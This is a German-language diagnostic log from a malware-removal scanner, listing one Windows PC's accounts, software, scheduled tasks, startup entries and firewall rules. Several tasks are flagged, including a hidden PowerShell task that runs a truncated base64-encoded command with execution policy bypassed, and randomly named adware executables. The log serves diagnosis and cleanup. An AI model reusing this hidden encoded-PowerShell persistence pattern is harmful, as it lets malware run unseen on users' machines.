aysec (S-1-5-21-2630849102-760198568-3561441068-1004 - Limited - Enabled) => C:\Users\aysec
DefaultAccount (S-1-5-21-2630849102-760198568-3561441068-503 - Limited - Disabled)
faruk (S-1-5-21-2630849102-760198568-3561441068-1009 - Limited - Disabled) => C:\Users\faruk
Gast (S-1-5-21-2630849102-760198568-3561441068-501 - Limited - Disabled)
Harun (S-1-5-21-2630849102-760198568-3561441068-1000 - Administrator - Enabled) => C:\Users\Harun
HomeGroupUser$ (S-1-5-21-2630849102-760198568-3561441068-1002 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

ACP Application (Version: 2016.0403.2316.14 - Advanced Micro Devices, Inc.) Hidden
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.4 - Advanced Micro Devices, Inc.)
Apple Application Support (32-Bit) (HKLM-x32\...\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
AVG PC TuneUp (HKLM-x32\...\AVG PC TuneUp) (Version: 16.32.2.3320 - AVG Technologies)
AVG PC TuneUp (x32 Version: 16.32.5 - AVG Technologies) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.16.282 - Avira Operations GmbH & Co. KG)
Avira Launcher (HKLM-x32\...\{3b87484e-d70b-4b4f-ad59-2ae89571e2cf}) (Version: 1.1.56.9119 - Avira Operations GmbH & Co. KG)
Avira Launcher (x32 Version: 1.1.56.9119 - Avira Operations GmbH & Co. KG) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.4.2.30944 - Electronic Arts)
Battlefield™ Hardline (HKLM-x32\...\{CB4AC3DA-8CC1-4516-86DA-4078B57DB229}) (Version: 1.1.0.5 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.7.1 - EA Digital Illusions CE AB)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.16 - Piriform)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version:  - Valve)
FMW 1 (Version: 1.73.2 - AVG Technologies) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HP Support Solutions Framework (HKLM-x32\...\{B1AD4FFB-DD17-43EC-8C30-B9E71EAD9132}) (Version: 12.2.8.17 - Hewlett-Packard Company)
iTunes (HKLM\...\{A31C5565-90D9-4615-AE13-94D86C3836C7}) (Version: 12.3.3.17 - Apple Inc.)
Java 8 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218051F0}) (Version: 8.0.510 - Oracle Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Firefox 41.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 41.0.2 (x86 de)) (Version: 41.0.2 - Mozilla)
OpenOffice 4.1.1 (HKLM-x32\...\{ACD0FFF9-6B35-43C1-82DB-9FF6990E8602}) (Version: 4.11.9775 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.5.12.2862 - Electronic Arts, Inc.)
PlaysTV (HKLM-x32\...\PlaysTV) (Version: 1.9.2-r111395-release - Plays.tv, LLC)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.994 - Even Balance, Inc.)
Raptr (HKLM-x32\...\Raptr) (Version: 5.1.2-r111396-release - Raptr, Inc)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.41.216.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.21 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.21.100 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Spotify) (Version: 1.0.25.127.g58007b4c - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Unity Web Player (HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinRAR 5.30 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
World of Warcraft Public Test (HKLM-x32\...\World of Warcraft Public Test) (Version:  - Blizzard Entertainment)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-2630849102-760198568-3561441068-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {04C44956-D7CD-4939-8F45-2FF07606F6B9} - System32\Tasks\bvxvcxxvaf => C:\Users\Harun\AppData\Local\bvxvcxxvaf\bvxvcxxvaf.exe <==== ACHTUNG
Task: {113ED8FC-24C5-4F57-AF03-B5534E316C7D} - System32\Tasks\{0E0B0E47-0D04-0808-0E11-0D0B0479110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8A (Der Dateneintrag hat 9596 mehr Zeichen). <==== ACHTUNG
Task: {114F0918-4CBC-4DF3-89CF-6EF208E7497C} - System32\Tasks\ffgogogoBrowserUpdateUA => C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe
Task: {11AE36CB-2A03-4DDC-A890-64628F30C9EF} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {17A4B275-EE49-4865-B9C9-53C2BB6B071F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-03-07] (Hewlett-Packard)
Task: {2798CFEA-C567-4F10-8381-056656C30F47} - System32\Tasks\{851C45EB-4FE8-42FB-AFE6-FF991A964C5B} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.7.0.103&amp;LastError=-3
Task: {2CF52B04-7B08-4ACC-A970-6B3FD69FDC4A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-29] (Google Inc.)
Task: {377F221C-47EF-4C4D-93AC-708AC0ABB8B9} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {396A2551-0AB1-4FE9-BED9-F057CF29CB2B} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {48BCCA7F-E9A5-4128-8E37-AE55AEFECA8E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {4F5C5854-312A-4A24-ABDF-3C644FC226F6} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {55B0D6D1-C72E-49EF-B7F0-5C87D9BFE997} - System32\Tasks\eAHPeNhIUJCheckTask => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe
Task: {5A0191B5-5F68-4856-A343-DE3E25F99E5C} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {5D51534D-F177-4E19-B56B-21112F1A3483} - System32\Tasks\ffgogogoBrowserUpdateCore => C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe
Task: {6152FDF3-58E5-498E-9CF3-A9D7D429B80B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-03-11] (Piriform Ltd)
Task: {671B6DA2-50FC-4121-874E-571D617F7B32} - System32\Tasks\eAHPeNhIUJBrowserUpdateCore => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe
Task: {6EEAF9D3-CC5F-4E6C-AC88-9DE7780771E9} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {70BAF52C-C324-4265-94E7-6336FBE7590E} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-04-15] (Microsoft Corporation)
Task: {732820F9-0FDC-4FC9-963F-25C3A2BA94B2} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe [2016-03-29] (AVG Technologies CZ, s.r.o.)
Task: {7E44129D-761D-427B-8DC4-16D8E966F159} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {8D3866F9-766B-48DB-A578-5C21B7EA69AC} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {92C84F68-7305-4AC7-833F-BA67477E36CA} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {A0FF1C4C-B44D-432C-AFCB-8A38CAAB8ADC} - \Microsoft\Windows\File Classification Infrastructure\Property Definition Sync -> Keine Datei <==== ACHTUNG
Task: {A1AE644B-6680-4D57-99C4-1FE32BE13D5B} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {A65B8F6D-A713-47F9-BB7D-735498D1C450} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-29] (Google Inc.)
Task: {AE71EAE0-A9B0-45EB-AC26-7137D2C92B00} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {B1CD5B0C-693D-4B7C-8323-C9FD491903EE} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {BAAAEC1C-119B-4660-A593-B5D97C4B8E6F} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {BCE21238-B804-496C-973D-49332B4BC6AE} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {C4675849-A54C-4834-BC5A-7D6ABA4BBB54} - System32\Tasks\eAHPeNhIUJBrowserUpdateUA => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe
Task: {C5625BD7-9D7F-45B0-8F71-CA915B4E0814} - System32\Tasks\Microsoft\Windows Embedded\Embedded App Launcher Startup => C:\Windows\system32\embeddedapplauncher.exe [2015-07-10] (Microsoft Corporation)
Task: {C6EA2FDA-643C-4333-A577-9FC6BC26272E} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {CB480BD6-186E-467C-B81B-091E970277CF} - System32\Tasks\ffgogogoCheckTask => C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe
Task: {CB660142-85F0-4F75-BF5F-CB86DACA85E2} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {CB6A3A7A-6827-4E97-90B5-33E9ED0C759B} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {D128CD79-AA9A-4682-9905-F14DB406D448} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {DADEF66A-B64F-42F7-84E8-039E9C3B9E69} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {DC4BE421-18AF-4C9E-9FFF-D48C8C6478E4} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {E653ACD2-7CC0-4B7B-9D01-730295A1F3D8} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {E6589D93-3FA5-49AF-9B33-493ACA29767E} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {E7892EEF-4D43-4930-B9D0-5C8888186A36} - System32\Tasks\{812DDBC9-50E6-4521-ABD6-CA97EAF205AD} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.7.0.103&amp;LastError=-3
Task: {E95F50C4-F888-4E6C-BAC1-02665CC2F866} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-03-11] (Hewlett-Packard)
Task: {EE3BDAA5-ED46-440A-8650-A160485AA160} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-07-10 13:00 - 2015-07-10 13:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-07-29 23:03 - 2015-07-15 04:04 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 01329936 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-19 18:06 - 2015-08-11 11:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-08-01 20:56 - 2015-08-02 16:03 - 00076152 _____ () C:\WINDOWS\SysWOW64\PnkBstrA.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-04-19 12:34 - 2016-04-19 12:34 - 00959176 _____ () C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\amd64\ClientTelemetry.dll
2015-10-01 09:51 - 2015-09-17 07:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-10 12:59 - 2015-07-10 12:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
2015-12-10 13:38 - 2015-11-25 06:20 - 06569472 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-10 13:38 - 2015-11-25 06:17 - 00471040 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-10 13:38 - 2015-11-25 06:17 - 01808384 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-01 09:51 - 2015-09-17 07:43 - 02274816 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-10 13:00 - 2015-07-10 18:43 - 00210432 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2016-04-10 17:32 - 2016-04-10 17:31 - 40500224 _____ () C:\Program Files (x86)\AVG\UiDll\2171\libcef.dll
2016-03-30 10:14 - 2016-03-27 09:58 - 01675928 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\libglesv2.dll
2016-03-30 10:14 - 2016-03-27 09:58 - 00086168 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\libegl.dll
2016-04-19 12:34 - 2016-04-19 12:34 - 00679624 _____ () C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\ClientTelemetry.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\WINDOWS\Temp:$DATA [16]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2009-06-10 23:00 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-2630849102-760198568-3561441068-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "StartCN"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKLM\...\StartupApproved\Run32: => "PlaysTV"
HKLM\...\StartupApproved\Run32: => "mbot_en_037050261"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\StartupFolder: => "Xfire2.bat"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "BingSvc"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "CCleaner Monitoring"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{EF9BA6B0-D956-4E04-A56D-B2D010471C6C}] => (Allow) A:\Steam\bin\steamwebhelper.exe
FirewallRules: [{8C66906E-1DAA-4F0B-88E4-E0163476C022}] => (Allow) A:\Steam\bin\steamwebhelper.exe
FirewallRules: [{B3BD4173-9D91-493E-9FA0-7BCAB414DBB8}] => (Allow) A:\Battle.net\Battle.net.exe
FirewallRules: [{04697792-0727-44EB-82BB-90E6B7E101BA}] => (Allow) A:\Battle.net\Battle.net.exe
FirewallRules: [{29D5CD28-05A0-4A40-8780-02DADE66DA50}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{3E4AF0F9-5D5F-47A5-89C3-8483E1874B3C}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{632E65A2-F35B-4491-A894-4259D389B688}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{DA65680E-6E44-4201-B745-F198AC8E3393}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [TCP Query User{52257645-0630-45E9-A1FB-39934F6C2678}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{4FE86D86-4126-4CAC-B0C6-0964BDDF3F14}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [{79EA3DA0-E438-4DF1-B00E-395F81892905}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{9074E1C2-24F4-4C85-931B-F7C36B46E9F0}] => (Allow) A:\Steam\Steam.exe
FirewallRules: [{88748628-27A1-4BE3-A512-B5BEDB3F0CBC}] => (Allow) A:\Steam\Steam.exe
FirewallRules: [{1064F6A1-CED6-4E5B-9557-D4C9CE2276C3}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4_x86.exe
